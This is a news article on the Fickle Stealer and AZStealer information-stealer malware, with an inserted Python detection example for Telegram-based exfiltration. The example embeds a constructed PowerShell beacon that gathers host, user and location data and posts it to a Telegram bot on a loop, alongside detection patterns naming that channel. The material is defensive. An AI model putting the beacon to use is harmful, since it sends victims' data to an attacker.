New Rust-based Fickle Malware Uses PowerShell for UAC Bypass and Data Exfiltration

Jun 20, 2024 | Newsroom | Threat Intelligence / Cybercrime

A new Rust-based information stealer malware called Fickle Stealer has been observed being delivered via multiple attack chains with the goal of harvesting sensitive information from compromised hosts.

Fortinet FortiGuard Labs said it is aware of four different distribution methods, namely a VBA dropper, a VBA downloader, a link downloader, and an executable downloader, with some of them using a PowerShell script to bypass User Account Control (UAC) and execute Fickle Stealer.

The PowerShell script ("bypass.ps1" or "u.ps1") is also designed to periodically send information about the victim, including country, city, IP address, operating system version, computer name, and username, to a Telegram bot controlled by the attacker.
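A defensive detection example, added here and not part of the article or of Fortinet's report: it scores constructed PowerShell script-block log text (the kind that lands in Event ID 4104 when script block logging is on) for the combination the article describes, a Telegram Bot API endpoint together with host-fingerprint collection, optionally inside a periodic sleep loop. The two sample script blocks, the `ip-api.example` URL, the `<TOKEN>` placeholder and the hit threshold are constructed assumptions, not indicators from the samples.

```python
import re

# Constructed sample script-block log text (not from the real Fickle Stealer scripts).
SAMPLE_SCRIPT_BLOCKS = {
    # A legitimate asset-inventory script: collects OS data but never contacts Telegram.
    "benign-inventory": r'''
$info = Get-ComputerInfo | Select-Object OsName, CsName
$info | Export-Csv -Path C:\inventory\hosts.csv
''',
    # Mirrors the behaviour described in the article: geo/IP, OS, host and user name,
    # posted to a Telegram bot on a timer. <TOKEN> and ip-api.example are placeholders.
    "telegram-beacon": r'''
while ($true) {
  $geo = Invoke-RestMethod -Uri "http://ip-api.example/json"
  $msg = "$($geo.country) $($geo.city) $($geo.query) $([Environment]::OSVersion.VersionString) $env:COMPUTERNAME $env:USERNAME"
  Invoke-WebRequest -Uri "https://api.telegram.org/bot<TOKEN>/sendMessage" -Method Post -Body @{chat_id=$chat; text=$msg}
  Start-Sleep -Seconds 600
}
''',
}

# Telegram Bot API calls are the exfiltration channel named in the article.
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot[^/\s\"']*/(sendMessage|sendDocument)", re.I)
# Each pattern covers one of the victim fields the article lists.
HOST_FINGERPRINT = [
    re.compile(r"\$env:COMPUTERNAME", re.I),
    re.compile(r"\$env:USERNAME", re.I),
    re.compile(r"OSVersion|Get-ComputerInfo|Win32_OperatingSystem", re.I),
    re.compile(r"\bcountry\b|\bcity\b", re.I),
]
# An endless loop with a sleep is the "periodically send" part.
PERIODIC_LOOP = re.compile(r"while\s*\(\s*\$true\s*\).*?Start-Sleep", re.I | re.S)


def score_script_block(text):
    """Return the list of behaviours found in one script block, in a fixed order."""
    findings = []
    if TELEGRAM_BOT_API.search(text):
        findings.append("telegram_bot_api")
    # Three or more distinct fingerprint fields (assumed threshold) avoids flagging
    # ordinary inventory scripts that only read OS information.
    if sum(1 for p in HOST_FINGERPRINT if p.search(text)) >= 3:
        findings.append("host_fingerprint")
    if PERIODIC_LOOP.search(text):
        findings.append("periodic_loop")
    return findings


def is_suspicious(text):
    """Alert only on the combination the article describes: bot API plus fingerprinting."""
    found = score_script_block(text)
    return "telegram_bot_api" in found and "host_fingerprint" in found


def triage(blocks):
    """Map each script-block name to a suspicious/not-suspicious verdict."""
    return {name: is_suspicious(text) for name, text in blocks.items()}
```

Requiring both behaviours keeps the alert quiet on inventory scripts and on harmless Telegram notifications that carry no host data; the `periodic_loop` finding is reported as supporting context rather than as a trigger.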


The stealer payload, which is protected using a packer, runs a series of anti-analysis checks to determine whether it is running in a sandbox or a virtual machine environment, after which it beacons out to a remote server to exfiltrate data in the form of JSON strings.

Fickle Stealer is no different from other variants in that it is designed to gather information from crypto wallets, web browsers powered by Chromium and the Gecko browser engine (i.e., Google Chrome, Microsoft Edge, Brave, Vivaldi, and Mozilla Firefox), and applications like AnyDesk, Discord, FileZilla, Signal, Skype, Steam, and Telegram.

It is also designed to export files matching the extensions .txt, .kdbx, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .odp, and wallet.dat.

UAC Bypass and Data Exfiltration

“In addition to some popular applications, this stealer searches sensitive files in parent directories of common installation directories to ensure comprehensive data gathering,” security researcher Pei Han Liao said. “It also receives a target list from the server, which makes Fickle Stealer more flexible.”

The disclosure comes as Symantec disclosed details of an open-source Python stealer called AZStealer that comes with the functionality to steal a wide variety of information. Available on GitHub, it has been advertised as the “best undetected Discord stealer.”


“All stolen information is zipped and depending on the size of the archive exfiltrated directly through Discord webhooks or first uploaded to Gofile online files storage and after that exfiltrated via Discord,” the Broadcom-owned company said.

“AZStealer will also attempt the theft of document files with predefined targeted extensions or those having specific keywords such as password, wallet, backup, etc. in the filename.”
